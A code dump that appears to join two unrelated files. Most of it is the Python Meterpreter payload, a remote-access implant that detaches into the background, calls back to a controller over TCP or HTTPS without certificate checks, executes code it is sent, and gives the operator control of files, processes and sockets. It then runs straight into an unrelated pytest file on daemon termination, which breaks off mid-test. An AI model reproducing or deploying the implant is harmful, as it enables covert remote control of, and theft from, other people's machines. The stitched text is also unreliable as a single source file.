error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
#@export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
#@export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
#@export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
self._send_packet(pkt)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 8:
packet = None # looks corrupt
break
pkt_length, _ = struct.unpack('>II', packet[:8])
if len(packet) != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet[8:]
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(8)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 8:
if first and len(packet) == 4:
received = 0
pkt_length = struct.unpack('>I', packet)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
pkt_length, pkt_type = struct.unpack('>II', packet)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return packet
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.interact_channels = []
self.processes = {}
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = 0
while idx in self.channels:
idx += 1
self.channels[idx] = channel
return idx
def add_process(self, process):
idx = 0
while idx in self.processes:
idx += 1
self.processes[idx] = process
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
test_daemon.py
|
# Copyright 2021-2022 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
#
import functools
import logging
import pprint
import re
import sys
import time
import attr
import psutil
import pytest
from pytestskipmarkers.utils import platform
from pytestshellutils.exceptions import FactoryNotRunning
from pytestshellutils.exceptions import FactoryNotStarted
from pytestshellutils.shell import Daemon
from pytestshellutils.utils.processes import _get_cmdline
from tests.conftest import Tempfiles
PROCESS_START_TIMEOUT = 2
log = logging.getLogger(__name__)
def kill_children(procs): # pragma: no cover
_, alive = psutil.wait_procs(procs, timeout=3)
for p in alive:
p.kill()
def test_daemon_process_termination(request, tempfiles: Tempfiles):
primary_childrend_count = 5
secondary_children_count = 3
script = tempfiles.makepyfile(
"""
#!{shebang}
# coding=utf-8
import time
import multiprocessing
def spin():
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def spin_children():
procs = []
for idx in range({secondary_children_count}):
proc = multiprocessing.Process(target=spin)
proc.daemon = True
proc.start()
procs.append(proc)
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def main():
procs = []
for idx in range({primary_childrend_count}):
proc = multiprocessing.Process(target=spin_children)
procs.append(proc)
proc.start()
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
# We're not terminating child processes on purpose. Our code should handle it.
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""".format(
shebang=sys.executable,
primary_childrend_count=primary_childrend_count,
secondary_children_count=secondary_children_count,
),
executable=True,
)
if not platform.is_windows():
factory_kwargs = dict(script_name=script)
else: # pragma: is-windows
# Windows don't know how to handle python scripts directly
factory_kwargs = dict(script_name=sys.executable, base_script_args=[script])
daemon = Daemon(start_timeout=1, **factory_kwargs)
daemon.start()
daemon_pid = daemon.pid
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
# Allow the script to start
time.sleep(PROCESS_START_TIMEOUT)
assert psutil.pid_exists(daemon_pid)
proc = psutil.Process(daemon_pid)
children = proc.children(recursive=True)
request.addfinalizer(functools.partial(kill_children, children))
child_count = len(children)
expected_count = primary_childrend_count + (primary_childrend_count * secondary_children_count)
if platform.is_windows() and sys.version_info >= (3, 7): # pragma: is-windows-ge-py37
# After Python 3.7 there's an extra spawning process
expected_count += 1
if platform.is_darwin() and sys.version_info >= (3, 8): # pragma: is-darwin-ge-py38
# macOS defaults to spawning new processed after Python 3.8
# Account for the forking process
expected_count += 1
assert child_count == expected_count, "{}!={}\n{}".format(
child_count,
expected_count,
pprint.pformat([_get_cmdline(child) or child for child in children]),
)
daemon.terminate()
assert psutil.pid_exists(daemon_pid) is False
for child in list(children): # pragma: no cover
if psutil.pid_exists(child.pid):
continue
children.remove(child)
assert not children, "len(children)=={} != 0\n{}".format(
len(children), pprint.pformat([_get_cmdline(child) or child for child in children])
)
@pytest.mark.skip("Will debug later")
def test_daemon_process_termination_parent_killed(request, tempfiles: Tempfiles):
primary_childrend_count = 5
secondary_children_count = 3
script = tempfiles.makepyfile(
"""
#!{shebang}
# coding=utf-8
import time
import multiprocessing
def spin():
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
def spin_children():
procs = []
for idx in range({secondary_children_count}):
proc = multiprocessing.Process(target=spin)
proc.daemon = True
proc.start()
procs.append(proc)
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
